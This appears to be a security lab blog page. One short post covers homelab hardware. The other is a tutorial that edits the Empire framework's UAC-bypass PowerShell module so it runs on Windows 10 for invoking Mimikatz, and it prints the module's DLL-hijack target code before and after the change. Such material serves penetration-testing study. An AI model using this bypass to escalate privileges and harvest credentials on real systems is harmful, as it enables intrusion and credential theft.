Infoseclabs part IV

There are some exciting new updates to the lab!  I finally got the Cisco ASA 5505 in, which replaced a Raspberry Pi running OpenWRT.  With this upgrade we are now able to have a functioning DMZ, which affords us the ability to have a publicly available lab!

 

ASA is in!
ASA is in!

 

I’ve also added a beefy new host and 52 port SG-500 Cisco switch.  The host has 96Gb of RAM and 2 quad core processors.  This was a huge boost in resources…time to grow the lab even more!

New host added
New host added to the lab

 

I also bought a small LACK from Ikea to use as a makeshift server rack.  It worked out perfectly!

20151115_113634

20151115_114014

20151115_214236

 

 

Check us out on IRC if you have any questions!

#infoseclabs

Read More

Using Empire in Kali 2.0 to bypass UAC and invoke Mimikatz on Win10

UPDATE:

The guys on the Empire team have since added support for Windows 10, so this is no longer necessary.  🙂

 

So I was testing out Empire the other day on a Windows 10 box, but kept getting an error message when trying to bypass UAC on Windows 10:

unsupportedOS
[!] Unsupported OS!
So I took a look at the script that was running under /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 and found this:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
# windows 7/2008
$szElevDll = 'CRYPTBASE.dll'
$szElevDir = $env:WINDIR + "\System32\sysprep"
$szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
$szElevExeFull = "$szElevDir\sysprep.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") {
# windows 8/2012
$szElevDll = 'NTWDBLIB.dll'
$szElevDir = $env:WINDIR + "\System32"
$szElevDirSysWow64 = ''
$szElevExeFull = "$szElevDir\cliconfg.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 8/2012 detected"
}
else {
"[!] Unsupported OS!"
throw("Unsupported OS!")
}

 

There it is, that dreaded “Unsupported OS!” error.  It looks like its doing a version check, but not specifically including Windows 10.  So lets change that:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
# windows 7/2008
$szElevDll = 'CRYPTBASE.dll'
$szElevDir = $env:WINDIR + "\System32\sysprep"
$szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
$szElevExeFull = "$szElevDir\sysprep.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) {
# windows 8/2012/10
$szElevDll = 'NTWDBLIB.dll'
$szElevDir = $env:WINDIR + "\System32"
$szElevDirSysWow64 = ''
$szElevExeFull = "$szElevDir\cliconfg.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 8/2012 detected"
}
else {
"[!] Unsupported OS!"
throw("Unsupported OS!")
}


In the original code on line 555 it was looking specifically for Windows 8 or Server 2012.  In the modified version I added a check for Windows 10 as well.

Success!
Success!

After modifying and saving the code, I ran the command again, and this time it worked!

 

Here’s a video of me doing this start to finish.  As always, if you have any questions feel free to drop by #infoseclabs on freenode.

 

 

Read More